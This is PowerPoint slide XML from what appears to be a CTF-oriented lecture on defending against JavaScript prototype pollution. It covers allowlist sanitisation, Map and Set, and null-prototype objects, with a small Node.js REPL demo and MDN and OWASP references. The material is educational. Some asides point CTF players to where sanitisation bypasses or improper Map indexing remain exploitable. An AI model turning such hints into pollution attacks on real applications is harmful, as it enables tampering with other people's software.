              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330200" indent="-171450"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The disadvantage with the allowlist approach is that it only works if you know the data structure beforehand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="330200" indent="-171450"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Might be relevant for CTF players, as bypassing the sanitization might be part of the solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{802CEDC7-63E4-7739-706E-4ABAB3E1E9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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3395579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b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set</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sz="1300" dirty="0"/>
              <a:t>If yo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>u are using objects to simply store data, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1] and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [2] instead [3]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: If you want to store key-value pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>: If you want to simply store unique values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>It is not vulnerable to prototype pollution if used properly (e.g. only use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> to manipulate data for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Thus, if you see a CTF challenge using them improperly, be happy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> m = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>undefined</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>m.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// proper usage</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>undefined</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; m[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// improper usage, may still be CTF-able</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] {}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E69E565-3CC5-7B1E-B766-37EBF988EE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4681835"/>
            <a:ext cx="6434807" cy="461665"/>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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-new-set-or-new-map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1820849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b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> 2</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dirty="0"/>
              <a:t>An additional advantage is that they have more useful instance methods than a pure object, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>forEach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, etc. [1], [2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The disadvantage is that most code in existence (e.g. libraries) can only handle using objects to store data, like function parameters only accepting objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The above two are irrelevant for CTF players</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E69E565-3CC5-7B1E-B766-37EBF988EE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="6434807" cy="33855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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3886638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b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>-prototype objects</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dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> cannot be used to store pure data, perhaps because of legacy code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>-prototype objects [1] can be used instead [2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>As mentioned before (did you listen?), getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> will not return the prototype and setting it simply creates a normal property, preventing prototype pollution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Likewise for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> is a property on the prototype instead of the object itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Ways to create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
